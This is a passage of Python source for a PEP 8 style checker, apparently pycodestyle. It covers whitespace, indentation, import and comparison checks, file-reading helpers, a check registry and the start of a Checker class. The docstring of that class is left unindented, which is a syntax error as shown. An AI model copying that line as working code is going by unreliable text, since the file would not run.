            (2, after, "E273 tab after keyword",
             "E271 multiple spaces after keyword"),
        )
        for group, gap, tab_msg, spaces_msg in checks:
            if '\t' in gap:
                yield match.start(group), tab_msg
            elif len(gap) > 1:
                yield match.start(group), spaces_msg
def missing_whitespace(logical_line):
    r"""Each comma, semicolon or colon should be followed by whitespace.
    Okay: [a, b]
    Okay: (3,)
    Okay: a[1:4]
    Okay: a[:4]
    Okay: a[1:]
    Okay: a[1:4:2]
    E231: ['a','b']
    E231: foo(bar,baz)
    E231: [{'a':'b'}]
    """
    line = logical_line
    # The final character never needs a follower, hence line[:-1].
    for index, char in enumerate(line[:-1]):
        if char not in ',;:':
            continue
        next_char = line[index + 1]
        if next_char in WHITESPACE:
            continue
        head = line[:index]
        if (char == ':' and head.count('[') > head.count(']') and
                head.rfind('{') < head.rfind('[')):
            continue  # Slice syntax, no space required
        if char == ',' and next_char == ')':
            continue  # Allow tuple with only one element: (3,)
        yield index, "E231 missing whitespace after '%s'" % char
def indentation(logical_line, previous_logical, indent_char,
                indent_level, previous_indent_level):
    r"""Use 4 spaces per indentation level.
    For really old code that you don't want to mess up, you can continue to
    use 8-space tabs.
    Okay: a = 1
    Okay: if a == 0:\n    a = 1
    E111:   a = 1
    E114:   # a = 1
    Okay: for item in items:\n    pass
    E112: for item in items:\npass
    E115: for item in items:\n# Hi\n    pass
    Okay: a = 1\nb = 2
    E113: a = 1\n    b = 2
    E116: a = 1\n    # b = 2
    """
    # Comment-only lines report the E114/E115/E116 variants (code + 3).
    if logical_line:
        offset, template = 0, "E11%d %s"
    else:
        offset, template = 3, "E11%d %s (comment)"
    if indent_level % 4:
        yield 0, template % (1 + offset, "indentation is not a multiple of four")
    expects_indent = previous_logical.endswith(':')
    if expects_indent and indent_level <= previous_indent_level:
        yield 0, template % (2 + offset, "expected an indented block")
    elif indent_level > previous_indent_level and not expects_indent:
        yield 0, template % (3 + offset, "unexpected indentation")
def continued_indentation(logical_line, tokens, indent_level, hang_closing,
                          indent_char, noqa, verbose):
    r"""Continuation lines indentation.
    Continuation lines should align wrapped elements either vertically
    using Python's implicit line joining inside parentheses, brackets
    and braces, or using a hanging indent.
    When using a hanging indent these considerations should be applied:
    - there should be no arguments on the first line, and
    - further indentation should be used to clearly distinguish itself as a
      continuation line.
    Okay: a = (\n)
    E123: a = (\n    )
    Okay: a = (\n    42)
    E121: a = (\n   42)
    E122: a = (\n42)
    E123: a = (\n    42\n    )
    E124: a = (24,\n     42\n)
    E125: if (\n    b):\n    pass
    E126: a = (\n        42)
    E127: a = (24,\n      42)
    E128: a = (24,\n    42)
    E129: if (a or\n    b):\n    pass
    E131: a = (\n    42\n 24)
    """
    first_row = tokens[0][2][0]
    nrows = 1 + tokens[-1][2][0] - first_row
    if noqa or nrows == 1:
        # Single physical line (or suppressed): nothing to check.
        return
    # indent_next tells us whether the next block is indented; assuming
    # that it is indented by 4 spaces, then we should not allow 4-space
    # indents on the final continuation line; in turn, some other
    # indents are allowed to have an extra 4 spaces.
    indent_next = logical_line.endswith(':')
    row = depth = 0
    # With tab indentation a hanging indent of one tab (8 columns) is also
    # accepted, in addition to the standard 4 columns.
    valid_hangs = (4,) if indent_char != '\t' else (4, 8)
    # remember how many brackets were opened on each line
    parens = [0] * nrows
    # relative indents of physical lines
    rel_indent = [0] * nrows
    # for each depth, collect a list of opening rows
    open_rows = [[0]]
    # for each depth, memorize the hanging indentation
    hangs = [None]
    # visual indents: maps a column to True (verified visual indent), str
    # (string/comment alignment) or a token text to line up with.
    indent_chances = {}
    last_indent = tokens[0][2]
    visual_indent = None
    # for each depth, memorize the visual indent column
    indent = [last_indent[1]]
    if verbose >= 3:
        print(">>> " + tokens[0][4].rstrip())
    for token_type, text, start, end, line in tokens:
        newline = row < start[0] - first_row
        if newline:
            row = start[0] - first_row
            # A line continued from a multiline token is not a fresh
            # continuation line; neither is a NEWLINE/NL token.
            newline = not last_token_multiline and token_type not in NEWLINE
        if newline:
            # this is the beginning of a continuation line.
            last_indent = start
            if verbose >= 3:
                print("... " + line.rstrip())
            # record the initial indent.
            rel_indent[row] = expand_indent(line) - indent_level
            # identify closing bracket
            close_bracket = (token_type == tokenize.OP and text in ']})')
            # is the indent relative to an opening bracket line?
            for open_row in reversed(open_rows[depth]):
                hang = rel_indent[row] - rel_indent[open_row]
                hanging_indent = hang in valid_hangs
                if hanging_indent:
                    break
            if hangs[depth]:
                # A hanging indent was already established at this depth;
                # later lines must match it exactly.
                hanging_indent = (hang == hangs[depth])
            # is there any chance of visual indent?
            visual_indent = (not close_bracket and hang > 0 and
                             indent_chances.get(start[1]))
            if close_bracket and indent[depth]:
                # closing bracket for visual indent
                if start[1] != indent[depth]:
                    yield (start, "E124 closing bracket does not match "
                           "visual indentation")
            elif close_bracket and not hang:
                # closing bracket matches indentation of opening bracket's line
                if hang_closing:
                    yield start, "E133 closing bracket is missing indentation"
            elif indent[depth] and start[1] < indent[depth]:
                if visual_indent is not True:
                    # visual indent is broken
                    yield (start, "E128 continuation line "
                           "under-indented for visual indent")
            elif hanging_indent or (indent_next and rel_indent[row] == 8):
                # hanging indent is verified
                if close_bracket and not hang_closing:
                    yield (start, "E123 closing bracket does not match "
                           "indentation of opening bracket's line")
                hangs[depth] = hang
            elif visual_indent is True:
                # visual indent is verified
                indent[depth] = start[1]
            elif visual_indent in (text, str):
                # ignore token lined up with matching one from a previous line
                pass
            else:
                # indent is broken
                if hang <= 0:
                    error = "E122", "missing indentation or outdented"
                elif indent[depth]:
                    error = "E127", "over-indented for visual indent"
                elif not close_bracket and hangs[depth]:
                    error = "E131", "unaligned for hanging indent"
                else:
                    hangs[depth] = hang
                    if hang > 4:
                        error = "E126", "over-indented for hanging indent"
                    else:
                        error = "E121", "under-indented for hanging indent"
                yield start, "%s continuation line %s" % error
        # look for visual indenting
        if (parens[row] and token_type not in (tokenize.NL, tokenize.COMMENT)
                and not indent[depth]):
            indent[depth] = start[1]
            indent_chances[start[1]] = True
            if verbose >= 4:
                print("bracket depth %s indent to %s" % (depth, start[1]))
        # deal with implicit string concatenation
        elif (token_type in (tokenize.STRING, tokenize.COMMENT) or
              text in ('u', 'ur', 'b', 'br')):
            indent_chances[start[1]] = str
        # special case for the "if" statement because len("if (") == 4
        elif not indent_chances and not row and not depth and text == 'if':
            indent_chances[end[1] + 1] = True
        elif text == ':' and line[end[1]:].isspace():
            open_rows[depth].append(row)
        # keep track of bracket depth
        if token_type == tokenize.OP:
            if text in '([{':
                depth += 1
                indent.append(0)
                hangs.append(None)
                if len(open_rows) == depth:
                    open_rows.append([])
                open_rows[depth].append(row)
                parens[row] += 1
                if verbose >= 4:
                    print("bracket depth %s seen, col %s, visual min = %s" %
                          (depth, start[1], indent[depth]))
            elif text in ')]}' and depth > 0:
                # parent indents should not be more than this one
                prev_indent = indent.pop() or last_indent[1]
                hangs.pop()
                for d in range(depth):
                    if indent[d] > prev_indent:
                        indent[d] = 0
                for ind in list(indent_chances):
                    if ind >= prev_indent:
                        del indent_chances[ind]
                del open_rows[depth + 1:]
                depth -= 1
                if depth:
                    indent_chances[indent[depth]] = True
                # Decrement the open-bracket count of the innermost row
                # that still has one open.
                for idx in range(row, -1, -1):
                    if parens[idx]:
                        parens[idx] -= 1
                        break
            assert len(indent) == depth + 1
            if start[1] not in indent_chances:
                # allow to line up tokens
                indent_chances[start[1]] = text
        last_token_multiline = (start[0] != end[0])
        if last_token_multiline:
            rel_indent[end[0] - first_row] = rel_indent[row]
    if indent_next and expand_indent(line) == indent_level + 4:
        pos = (start[0], indent[0] + 4)
        if visual_indent:
            code = "E129 visually indented line"
        else:
            code = "E125 continuation line"
        yield pos, "%s with same indent as next logical line" % code
def whitespace_before_parameters(logical_line, tokens):
    r"""Avoid extraneous whitespace.
    Avoid extraneous whitespace in the following situations:
    - before the open parenthesis that starts the argument list of a
      function call.
    - before the open parenthesis that starts an indexing or slicing.
    Okay: spam(1)
    E211: spam (1)
    Okay: dict['key'] = list[index]
    E211: dict ['key'] = list[index]
    E211: dict['key'] = list [index]
    """
    prev_type, prev_text, __, prev_end, __ = tokens[0]
    for index, token in enumerate(tokens[1:], 1):
        token_type, text, start, end = token[:4]
        opens_call = token_type == tokenize.OP and text in '(['
        if (opens_call and
                start != prev_end and
                (prev_type == tokenize.NAME or prev_text in '}])') and
                # Syntax "class A (B):" is allowed, but avoid it
                (index < 2 or tokens[index - 2][1] != 'class') and
                # Allow "return (a.foo for a in range(5))"
                not keyword.iskeyword(prev_text)):
            yield prev_end, "E211 whitespace before '%s'" % text
        prev_type, prev_text, prev_end = token_type, text, end
def whitespace_around_operator(logical_line):
    r"""Avoid extraneous whitespace around an operator.
    Okay: a = 12 + 3
    E221: a = 4  + 5
    E222: a = 4 +  5
    E223: a = 4\t+ 5
    E224: a = 4 +\t5
    """
    for match in OPERATOR_REGEX.finditer(logical_line):
        # Group 1 is the whitespace before the operator, group 2 after it;
        # a tab always wins over the "multiple spaces" diagnosis.
        for group, (tab_code, space_code, side) in enumerate(
                [("E223", "E221", "before"), ("E224", "E222", "after")], 1):
            ws = match.group(group)
            if '\t' in ws:
                yield match.start(group), "%s tab %s operator" % (
                    tab_code, side)
            elif len(ws) > 1:
                yield match.start(group), "%s multiple spaces %s operator" % (
                    space_code, side)
def missing_whitespace_around_operator(logical_line, tokens):
    r"""Surround operators with a single space on either side.
    - Always surround these binary operators with a single space on
      either side: assignment (=), augmented assignment (+=, -= etc.),
      comparisons (==, <, >, !=, <=, >=, in, not in, is, is not),
      Booleans (and, or, not).
    - If operators with different priorities are used, consider adding
      whitespace around the operators with the lowest priorities.
    Okay: i = i + 1
    Okay: submitted += 1
    Okay: x = x * 2 - 1
    Okay: hypot2 = x * x + y * y
    Okay: c = (a + b) * (a - b)
    Okay: foo(bar, key='word', *args, **kwargs)
    Okay: alpha[:-i]
    E225: i=i+1
    E225: submitted +=1
    E225: x = x /2 - 1
    E225: z = x **y
    E226: c = (a+b) * (a-b)
    E227: c = a|b
    E228: msg = fmt%(errno, errmsg)
    """
    parens = 0
    # need_space is a multi-state flag:
    #   False       -> no space is expected after the previous token
    #   True        -> a space is mandatory (WS_NEEDED_OPERATORS)
    #   (pos, had)  -> space is optional; pos is where to report and 'had'
    #                  records whether the opening side had a space
    # (None is a transient value converted to a tuple right away below.)
    need_space = False
    prev_type = tokenize.OP
    prev_text = prev_end = None
    for token_type, text, start, end, line in tokens:
        if token_type in SKIP_COMMENTS:
            continue
        if text in ('(', 'lambda'):
            parens += 1
        elif text == ')':
            parens -= 1
        if need_space:
            if start != prev_end:
                # Found a (probably) needed space
                if need_space is not True and not need_space[1]:
                    yield (need_space[0],
                           "E225 missing whitespace around operator")
                need_space = False
            elif text == '>' and prev_text in ('<', '-'):
                # Tolerate the "<>" operator, even if running Python 3
                # Deal with Python 3's annotated return value "->"
                pass
            else:
                if need_space is True or need_space[1]:
                    # A needed trailing space was not found
                    yield prev_end, "E225 missing whitespace around operator"
                elif prev_text != '**':
                    # Optional-space operator written without spaces:
                    # classify it as arithmetic, modulo, or bitwise/shift.
                    code, optype = 'E226', 'arithmetic'
                    if prev_text == '%':
                        code, optype = 'E228', 'modulo'
                    elif prev_text not in ARITHMETIC_OP:
                        code, optype = 'E227', 'bitwise or shift'
                    yield (need_space[0], "%s missing whitespace "
                           "around %s operator" % (code, optype))
                need_space = False
        elif token_type == tokenize.OP and prev_end is not None:
            if text == '=' and parens:
                # Allow keyword args or defaults: foo(bar=None).
                pass
            elif text in WS_NEEDED_OPERATORS:
                need_space = True
            elif text in UNARY_OPERATORS:
                # Check if the operator is being used as a binary operator
                # Allow unary operators: -123, -x, +1.
                # Allow argument unpacking: foo(*args, **kwargs).
                if (prev_text in '}])' if prev_type == tokenize.OP
                        else prev_text not in KEYWORDS):
                    need_space = None
            elif text in WS_OPTIONAL_OPERATORS:
                need_space = None
            if need_space is None:
                # Surrounding space is optional, but ensure that
                # trailing space matches opening space
                need_space = (prev_end, start != prev_end)
            elif need_space and start == prev_end:
                # A needed opening space was not found
                yield prev_end, "E225 missing whitespace around operator"
                need_space = False
        prev_type = token_type
        prev_text = text
        prev_end = end
def whitespace_around_comma(logical_line):
    r"""Avoid extraneous whitespace after a comma or a colon.
    Note: these checks are disabled by default
    Okay: a = (1, 2)
    E241: a = (1,  2)
    E242: a = (1,\t2)
    """
    for match in WHITESPACE_AFTER_COMMA_REGEX.finditer(logical_line):
        offset = match.start() + 1
        separator = match.group()[0]
        if '\t' in match.group():
            yield offset, "E242 tab after '%s'" % separator
        else:
            yield offset, "E241 multiple spaces after '%s'" % separator
def whitespace_around_named_parameter_equals(logical_line, tokens):
    r"""Don't use spaces around the '=' sign in function arguments.
    Don't use spaces around the '=' sign when used to indicate a
    keyword argument or a default parameter value.
    Okay: def complex(real, imag=0.0):
    Okay: return magic(r=real, i=imag)
    Okay: boolean(a == b)
    Okay: boolean(a != b)
    Okay: boolean(a <= b)
    Okay: boolean(a >= b)
    Okay: def foo(arg: int = 42):
    E251: def complex(real, imag = 0.0):
    E251: return magic(r = real, i = imag)
    """
    depth = 0                # parenthesis nesting level
    expect_adjacent = False  # previous token was a keyword/default '='
    last_end = None
    annotated = False        # inside an annotated argument of a 'def'
    in_def = logical_line.startswith('def')
    message = "E251 unexpected spaces around keyword / parameter equals"
    for token_type, text, start, end, line in tokens:
        if token_type == tokenize.NL:
            continue
        if expect_adjacent:
            # The token right after '=' must touch it.
            expect_adjacent = False
            if start != last_end:
                yield (last_end, message)
        if token_type == tokenize.OP:
            if text == '(':
                depth += 1
            elif text == ')':
                depth -= 1
            elif in_def and text == ':' and depth == 1:
                # PEP 3107 annotation: spaces around '=' are then allowed.
                annotated = True
            elif text == ',' and depth == 1:
                annotated = False
            elif depth and text == '=' and not annotated:
                expect_adjacent = True
                if start != last_end:
                    yield (last_end, message)
            if not depth:
                annotated = False
        last_end = end
def whitespace_before_comment(logical_line, tokens):
    r"""Separate inline comments by at least two spaces.
    An inline comment is a comment on the same line as a statement. Inline
    comments should be separated by at least two spaces from the statement.
    They should start with a # and a single space.
    Each line of a block comment starts with a # and a single space
    (unless it is indented text inside the comment).
    Okay: x = x + 1  # Increment x
    Okay: x = x + 1    # Increment x
    Okay: # Block comment
    E261: x = x + 1 # Increment x
    E262: x = x + 1  ## Increment x
    E262: x = x + 1  #!  Increment x
    E265: #Block comment
    E266: ### Block comment
    """
    prev_end = (0, 0)
    for token_type, text, start, end, line in tokens:
        if token_type == tokenize.COMMENT:
            # A comment preceded by code on the same line is "inline".
            inline = bool(line[:start[1]].strip())
            if inline and prev_end[0] == start[0] and \
                    start[1] < prev_end[1] + 2:
                yield (prev_end,
                       "E261 at least two spaces before inline comment")
            symbol, sp, comment = text.partition(' ')
            bad_prefix = symbol not in '#:' and (symbol.lstrip('#')[:1] or '#')
            if inline:
                if bad_prefix or comment[:1] in WHITESPACE:
                    yield start, "E262 inline comment should start with '# '"
            elif bad_prefix and (bad_prefix != '!' or start[0] > 1):
                if bad_prefix != '#':
                    yield start, "E265 block comment should start with '# '"
                elif comment:
                    yield start, "E266 too many leading '#' for block comment"
        elif token_type != tokenize.NL:
            prev_end = end
def imports_on_separate_lines(logical_line):
    r"""Imports should usually be on separate lines.
    Okay: import os\nimport sys
    E401: import sys, os
    Okay: from subprocess import Popen, PIPE
    Okay: from myclas import MyClass
    Okay: from foo.bar.yourclass import YourClass
    Okay: import myclass
    Okay: import foo.bar.yourclass
    """
    if logical_line.startswith('import '):
        comma = logical_line.find(',')
        # A semicolon before the comma means the comma belongs to another
        # statement, e.g. "import os; x = 1, 2".
        if comma > -1 and ';' not in logical_line[:comma]:
            yield comma, "E401 multiple imports on one line"
def module_imports_on_top_of_file(
        logical_line, indent_level, checker_state, noqa):
    r"""Imports are always put at the top of the file, just after any module
    comments and docstrings, and before module globals and constants.
    Okay: import os
    Okay: # this is a comment\nimport os
    Okay: '''this is a module docstring'''\nimport os
    Okay: r'''this is a module docstring'''\nimport os
    Okay: try:\n    import x\nexcept:\n    pass\nelse:\n    pass\nimport y
    Okay: try:\n    import x\nexcept:\n    pass\nfinally:\n    pass\nimport y
    E402: a=1\nimport os
    E402: 'One string'\n"Two string"\nimport os
    E402: a=1\nfrom sys import x
    Okay: if x:\n    import os
    """
    def is_string_literal(line):
        # Skip a u/b prefix, then an optional r prefix, then expect a quote.
        if line[0] in 'uUbB':
            line = line[1:]
        if line and line[0] in 'rR':
            line = line[1:]
        return line and (line[0] == '"' or line[0] == "'")

    allowed_try_keywords = ('try', 'except', 'else', 'finally')
    if indent_level:  # Allow imports in conditional statements or functions
        return
    if not logical_line:  # Allow empty lines or comments
        return
    if noqa:
        return
    line = logical_line
    if line.startswith(('import ', 'from ')):
        if checker_state.get('seen_non_imports', False):
            yield 0, "E402 module level import not at top of file"
    elif line.startswith(allowed_try_keywords):
        # Allow try, except, else, finally keywords intermixed with imports
        # in order to support conditional importing.
        return
    elif is_string_literal(line):
        # The first literal is a docstring, allow it. Otherwise, report error.
        if checker_state.get('seen_docstring', False):
            checker_state['seen_non_imports'] = True
        else:
            checker_state['seen_docstring'] = True
    else:
        checker_state['seen_non_imports'] = True
def compound_statements(logical_line):
    r"""Compound statements (on the same line) are generally discouraged.
    While sometimes it's okay to put an if/for/while with a small body
    on the same line, never do this for multi-clause statements.
    Also avoid folding such long lines!
    Always use a def statement instead of an assignment statement that
    binds a lambda expression directly to a name.
    Okay: if foo == 'blah':\n    do_blah_thing()
    Okay: do_one()
    Okay: do_two()
    Okay: do_three()
    E701: if foo == 'blah': do_blah_thing()
    E701: for x in lst: total += x
    E701: while t < 10: t = delay()
    E701: if foo == 'blah': do_blah_thing()
    E701: else: do_non_blah_thing()
    E701: try: something()
    E701: finally: cleanup()
    E701: if foo == 'blah': one(); two(); three()
    E702: do_one(); do_two(); do_three()
    E703: do_four();  # useless semicolon
    E704: def f(x): return 2*x
    E731: f = lambda x: 2*x
    """
    line = logical_line
    last_char = len(line) - 1

    # Scan every colon; one that sits outside all bracket pairs ends a
    # clause header, so code after it is a compound statement.
    pos = line.find(':')
    while -1 < pos < last_char:
        head = line[:pos]
        outside_brackets = (head.count('{') <= head.count('}') and
                            head.count('[') <= head.count(']') and
                            head.count('(') <= head.count(')'))
        if outside_brackets:
            lambda_kw = LAMBDA_REGEX.search(head)
            if lambda_kw:
                head = line[:lambda_kw.start()].rstrip()
                if head[-1:] == '=' and isidentifier(head[:-1].strip()):
                    yield 0, ("E731 do not assign a lambda expression, use a "
                              "def")
                break
            if head.startswith('def '):
                yield 0, "E704 multiple statements on one line (def)"
            else:
                yield pos, "E701 multiple statements on one line (colon)"
        pos = line.find(':', pos + 1)

    # Any semicolon separates statements; a trailing one is just useless.
    for pos, char in enumerate(line):
        if char == ';':
            if pos < last_char:
                yield pos, "E702 multiple statements on one line (semicolon)"
            else:
                yield pos, "E703 statement ends with a semicolon"
def explicit_line_join(logical_line, tokens):
    r"""Avoid explicit line join between brackets.
    The preferred way of wrapping long lines is by using Python's implied line
    continuation inside parentheses, brackets and braces. Long lines can be
    broken over multiple lines by wrapping expressions in parentheses. These
    should be used in preference to using a backslash for line continuation.
    E502: aaa = [123, \\n       123]
    E502: aaa = ("bbb " \\n       "ccc")
    Okay: aaa = [123,\n       123]
    Okay: aaa = ("bbb "\n       "ccc")
    Okay: aaa = "bbb " \\n    "ccc"
    """
    row_of_prev_start = row_of_prev_end = depth = 0
    backslash = None
    for token_type, text, start, end, line in tokens:
        if start[0] != row_of_prev_start and depth and backslash:
            # Inside brackets the backslash continuation is pointless.
            yield backslash, "E502 the backslash is redundant between brackets"
        if end[0] != row_of_prev_end:
            # Entered a new physical line: remember a trailing backslash.
            if line.rstrip('\r\n').endswith('\\'):
                backslash = (end[0], len(line.splitlines()[-1]) - 1)
            else:
                backslash = None
            row_of_prev_start = row_of_prev_end = end[0]
        else:
            row_of_prev_start = start[0]
        if token_type == tokenize.OP:
            if text in '([{':
                depth += 1
            elif text in ')]}':
                depth -= 1
def comparison_to_singleton(logical_line, noqa):
    r"""Comparison to singletons should use "is" or "is not".
    Comparisons to singletons like None should always be done
    with "is" or "is not", never the equality operators.
    Okay: if arg is not None:
    E711: if arg != None:
    E711: if None == arg:
    E712: if arg == True:
    E712: if False == arg:
    Also, beware of writing if x when you really mean if x is not None --
    e.g. when testing whether a variable or argument that defaults to None was
    set to some other value. The other value might have a type (such as a
    container) that could be false in a boolean context!
    """
    if noqa:
        return
    match = COMPARE_SINGLETON_REGEX.search(logical_line)
    if not match:
        return
    singleton = match.group(1) or match.group(3)
    same = (match.group(2) == '==')
    msg = "'if cond is %s:'" % (('' if same else 'not ') + singleton)
    code = 'E711' if singleton == 'None' else 'E712'
    if code == 'E712':
        # True/False comparisons can usually be spelled as a plain
        # truthiness test.
        nonzero = ((singleton == 'True' and same) or
                   (singleton == 'False' and not same))
        msg += " or 'if %scond:'" % ('' if nonzero else 'not ')
    yield match.start(2), ("%s comparison to %s should be %s" %
                           (code, singleton, msg))
def comparison_negative(logical_line):
    r"""Negative comparison should be done using "not in" and "is not".
    Okay: if x not in y:\n    pass
    Okay: assert (X in Y or X is Z)
    Okay: if not (X in Y):\n    pass
    Okay: zz = x is not y
    E713: Z = not X in Y
    E713: if not X.B in Y:\n    pass
    E714: if not X is Y:\n    pass
    E714: Z = not X.B is Y
    """
    match = COMPARE_NEGATIVE_REGEX.search(logical_line)
    if match:
        code, advice = (
            ("E713", "test for membership should be 'not in'")
            if match.group(2) == 'in' else
            ("E714", "test for object identity should be 'is not'"))
        yield match.start(1), "%s %s" % (code, advice)
def comparison_type(logical_line):
    r"""Object type comparisons should always use isinstance().
    Do not compare types directly.
    Okay: if isinstance(obj, int):
    E721: if type(obj) is type(1):
    When checking if an object is a string, keep in mind that it might be a
    unicode string too! In Python 2.3, str and unicode have a common base
    class, basestring, so you can do:
    Okay: if isinstance(obj, basestring):
    Okay: if type(a1) is type(b1):
    """
    match = COMPARE_TYPE_REGEX.search(logical_line)
    if not match:
        return
    inst = match.group(1)
    if inst and isidentifier(inst) and inst not in SINGLETONS:
        return  # Allow comparison for types which are not obvious
    yield match.start(), "E721 do not compare types, use 'isinstance()'"
def python_3000_has_key(logical_line, noqa):
    r"""The {}.has_key() method is removed in Python 3: use the 'in' operator.
    Okay: if "alph" in d:\n    print d["alph"]
    W601: assert d.has_key('alph')
    """
    if noqa:
        return
    offset = logical_line.find('.has_key(')
    if offset != -1:
        yield offset, "W601 .has_key() is deprecated, use 'in'"
def python_3000_raise_comma(logical_line):
    r"""When raising an exception, use "raise ValueError('message')".
    The older form is removed in Python 3.
    Okay: raise DummyError("Message")
    W602: raise DummyError, "Message"
    """
    match = RAISE_COMMA_REGEX.match(logical_line)
    if not match:
        return
    # Lines matched by RERAISE_COMMA_REGEX are tolerated (three-argument
    # raise forms used for re-raising with a traceback).
    if RERAISE_COMMA_REGEX.match(logical_line):
        return
    yield match.end() - 1, "W602 deprecated form of raising exception"
def python_3000_not_equal(logical_line):
    r"""New code should always use != instead of <>.
    The older syntax is removed in Python 3.
    Okay: if a != 'no':
    W603: if a <> 'no':
    """
    offset = logical_line.find('<>')
    if offset != -1:
        yield offset, "W603 '<>' is deprecated, use '!='"
def python_3000_backticks(logical_line):
    r"""Backticks are removed in Python 3: use repr() instead.
    Okay: val = repr(1 + 2)
    W604: val = `1 + 2`
    """
    offset = logical_line.find('`')
    if offset != -1:
        yield offset, "W604 backticks are deprecated, use 'repr()'"
##############################################################################
# Helper functions
##############################################################################


if '' == ''.encode():
    # Python 2: ''.encode() still yields a str equal to '', so this branch
    # is taken; rely on the implicit encoding when reading source files.
    def readlines(filename):
        """Read the source code."""
        with open(filename, 'rU') as f:
            return f.readlines()

    # Python 2 has no str.isidentifier(); approximate it with a regex.
    isidentifier = re.compile(r'[a-zA-Z_]\w*$').match
    stdin_get_value = sys.stdin.read
else:
    # Python 3: ''.encode() returns bytes, which never compares equal to
    # str, so this branch is taken instead.
    def readlines(filename):
        """Read the source code."""
        try:
            with open(filename, 'rb') as f:
                # Honor the PEP 263 coding declaration / BOM.
                (coding, lines) = tokenize.detect_encoding(f.readline)
                f = TextIOWrapper(f, coding, line_buffering=True)
                return [l.decode(coding) for l in lines] + f.readlines()
        except (LookupError, SyntaxError, UnicodeError):
            # Fall back if file encoding is improperly declared
            with open(filename, encoding='latin-1') as f:
                return f.readlines()

    isidentifier = str.isidentifier

    def stdin_get_value():
        return TextIOWrapper(sys.stdin.buffer, errors='ignore').read()

# Matches "# noqa" / "# nopep8" comments that disable checks for a line.
noqa = re.compile(r'# no(?:qa|pep8)\b', re.I).search
def expand_indent(line):
    r"""Return the amount of indentation.
    Tabs are expanded to the next multiple of 8.
    >>> expand_indent('    ')
    4
    >>> expand_indent('\t')
    8
    >>> expand_indent('       \t')
    8
    >>> expand_indent('        \t')
    16
    """
    if '\t' not in line:
        # Fast path: spaces only, the indent is just the stripped length.
        return len(line) - len(line.lstrip())
    width = 0
    for char in line:
        if char == '\t':
            # Jump to the next multiple of 8.
            width = width // 8 * 8 + 8
        elif char == ' ':
            width += 1
        else:
            break
    return width
def mute_string(text):
    """Replace contents with 'xxx' to prevent syntax matching.
    >>> mute_string('"abc"')
    '"xxx"'
    >>> mute_string("'''abc'''")
    "'''xxx'''"
    >>> mute_string("r'abc'")
    "r'xxx'"
    """
    # Find the first quote char, skipping prefix letters (e.g. r or u).
    begin = text.index(text[-1]) + 1
    stop = len(text) - 1
    # Widen the untouched bounds for triple-quoted strings.
    if text[-3:] in ('"""', "'''"):
        begin += 2
        stop -= 2
    return text[:begin] + 'x' * (stop - begin) + text[stop:]
def parse_udiff(diff, patterns=None, parent='.'):
    """Return a dictionary of matching lines."""
    # For each file of the diff, the entry key is the filename,
    # and the value is a set of row numbers to consider.
    result = {}
    path = nrows = None
    for line in diff.splitlines():
        if nrows:
            # Still consuming the current hunk: count every line that is
            # not a removal.
            if line[:1] != '-':
                nrows -= 1
            continue
        if line.startswith('@@ '):
            hunk_match = HUNK_REGEX.match(line)
            (row, nrows) = [int(g or '1') for g in hunk_match.groups()]
            result[path].update(range(row, row + nrows))
        elif line.startswith('+++'):
            path = line[4:].split('\t', 1)[0]
            if path.startswith('b/'):
                path = path[2:]
            result[path] = set()
    return dict([(os.path.join(parent, path), rows)
                 for (path, rows) in result.items()
                 if rows and filename_match(path, patterns)])
def normalize_paths(value, parent=os.curdir):
    """Parse a comma-separated list of paths.
    Return a list of absolute paths.
    """
    if not value:
        return []
    if isinstance(value, list):
        # Already parsed: hand it back untouched.
        return value
    paths = []
    for item in value.split(','):
        item = item.strip()
        if '/' in item:
            # Anything that looks like a path is anchored to the parent dir.
            item = os.path.abspath(os.path.join(parent, item))
        paths.append(item.rstrip('/'))
    return paths
def filename_match(filename, patterns, default=True):
    """Check if patterns contains a pattern that matches filename.
    If patterns is unspecified, this always returns True.
    """
    if not patterns:
        return default
    for pattern in patterns:
        if fnmatch(filename, pattern):
            return True
    return False
def _is_eol_token(token):
    # A token ends the physical line when it is a NEWLINE/NL token, or
    # when the remainder of its physical line is just an escaped newline.
    return token[0] in NEWLINE or token[4][token[3][1]:].lstrip() == '\\\n'


if COMMENT_WITH_NL:
    # If the tokenizer reports comments with the trailing newline attached
    # (COMMENT_WITH_NL), also treat a COMMENT token whose text equals the
    # whole physical line as end-of-line.
    def _is_eol_token(token, _eol_token=_is_eol_token):
        return _eol_token(token) or (token[0] == tokenize.COMMENT and
                                     token[1] == token[4])
##############################################################################
# Framework to run all checks
##############################################################################


# Registry of check functions, keyed by the kind of argument they inspect.
# Each inner dict maps a check object to (error codes, argument names),
# as populated by register_check() below.
_checks = {'physical_line': {}, 'logical_line': {}, 'tree': {}}
def _get_parameters(function):
    """Return the positional parameter names of *function*.

    Compatible with both old and new Pythons: ``inspect.getargspec`` was
    deprecated in 3.0 and removed in Python 3.11, so prefer
    ``inspect.getfullargspec`` when it exists.
    """
    try:
        return inspect.getfullargspec(function)[0]
    except AttributeError:
        # Python 2: getfullargspec does not exist yet.
        return inspect.getargspec(function)[0]


def register_check(check, codes=None):
    """Register a new check object.

    *check* is either a function whose first argument is named
    'physical_line' or 'logical_line', or a class whose __init__ takes
    (self, tree).  *codes* optionally lists the error codes the check
    reports; when omitted for functions, the codes are harvested from
    the docstring.
    """
    def _add_check(check, kind, codes, args):
        # Merge codes when the same check is registered more than once.
        if check in _checks[kind]:
            _checks[kind][check][0].extend(codes or [])
        else:
            _checks[kind][check] = (codes or [''], args)
    if inspect.isfunction(check):
        args = _get_parameters(check)
        if args and args[0] in ('physical_line', 'logical_line'):
            if codes is None:
                codes = ERRORCODE_REGEX.findall(check.__doc__ or '')
            _add_check(check, args[0], codes, args)
    elif inspect.isclass(check):
        if _get_parameters(check.__init__)[:2] == ['self', 'tree']:
            _add_check(check, 'tree', codes, None)
def init_checks_registry():
    """Register all globally visible functions.
    The first argument name is either 'physical_line' or 'logical_line'.
    """
    module = inspect.getmodule(register_check)
    for name, function in inspect.getmembers(module, inspect.isfunction):
        register_check(function)


init_checks_registry()
class Checker(object):
"""Load a Python source file, tokenize it, check coding style."""
    def __init__(self, filename=None, lines=None,
                 options=None, report=None, **kwargs):
        """Initialize the checker from a filename, literal lines, or stdin.

        filename -- path to check; None reads from *lines*, '-' from stdin.
        lines    -- optional list of source lines (overrides reading).
        options  -- StyleGuide options; built from **kwargs when omitted.
        report   -- report object; defaults to the one in *options*.
        """
        if options is None:
            options = StyleGuide(kwargs).options
        else:
            # Passing both an options object and keyword overrides is
            # ambiguous, so it is forbidden.
            assert not kwargs
        self._io_error = None
        self._physical_checks = options.physical_checks
        self._logical_checks = options.logical_checks
        self._ast_checks = options.ast_checks
        self.max_line_length = options.max_line_length
